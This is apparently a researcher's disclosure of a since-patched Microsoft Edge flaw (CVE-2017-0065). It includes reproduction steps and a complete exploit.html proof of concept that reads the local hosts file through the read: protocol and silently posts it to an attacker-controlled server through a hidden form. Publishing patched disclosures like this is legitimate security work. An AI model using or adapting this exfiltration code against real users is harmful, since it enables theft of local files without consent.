This exploit was reported to Microsoft and I was acknowledged for doing so. It was patched on March 14th 2017 as CVE-2017-0065 (MS17-007) and will not work once the related patches are applied. Source code is provided for educational purposes only.
This exploit requires that the victim has a crafted file (exploit.html) on their file system at a known location. The victim does not need to open it, just have it there. The file is then invoked by visiting a malicious website (malicious_server.php).
With this exploit, local files can be uploaded to a visited malicious website without the user's consent.
Here's how to reproduce:
1. Edit exploit.html so that the form action points at your test webserver's address.
2. Serve malicious_server.php on a PHP-enabled webserver, so you can reach it at: http://yourwebserver.com/malicious_server.php
3. Place exploit.html in the following folder: c:\windows\system32\drivers\etc\ (the read: protocol seems picky about the file location)
4. Navigate to http://yourwebserver.com/malicious_server.php with Edge.
Here's what should happen:
1. Navigating to malicious_server.php triggers a browser redirect to: read:,c:\windows\system32\drivers\etc\exploit.html
2. exploit.html then prompts the user to click anywhere on the empty page.
3. After a click, exploit.html opens a window with the URL: read:,c:\windows\system32\drivers\etc\hosts
4. If the window opens, the contents of the opened window (the hosts file) are copied into a hidden form, the window is closed, and the form is submitted back to malicious_server.php on your webserver.
5. malicious_server.php displays the contents of the submitted file.
A full PoC is available at: https://github.com/Dankirk/cve-2017-0065. The exploit.html used in the PoC follows:
<!doctype html>
<html>
<head><meta charset="UTF-8"></head>
<body>
  <!-- Hidden form that carries the leaked file back to the attacker's server;
       the action must point at wherever malicious_server.php is hosted. -->
  <form id="xss_form" method="post" action="http://127.0.0.1/malicious_server.php">
    <input id="xss" type="hidden" name="xss" value="">
  </form>
  Click anywhere to submit your hosts file
  <script>
    document.onclick = function(event) {
      event.preventDefault();
      // Append a random value to prevent caching
      var url = "read:,C:\\windows\\system32\\drivers\\etc\\hosts," + Math.floor(Math.random() * 1000);
      // The click supplies the user gesture window.open needs to get past the popup blocker
      var w = window.open(url);
      if (w) {
        // Copy window contents, close and submit.
        // This is allowed because we are the same origin, since we are using subsequent read:, requests
        document.getElementById("xss").value = w.document.body.innerHTML;
        w.close();
        document.getElementById("xss_form").submit();
      } else {
        document.body.innerHTML = "Popups are blocked :<";
      }
    };
  </script>
</body>
</html>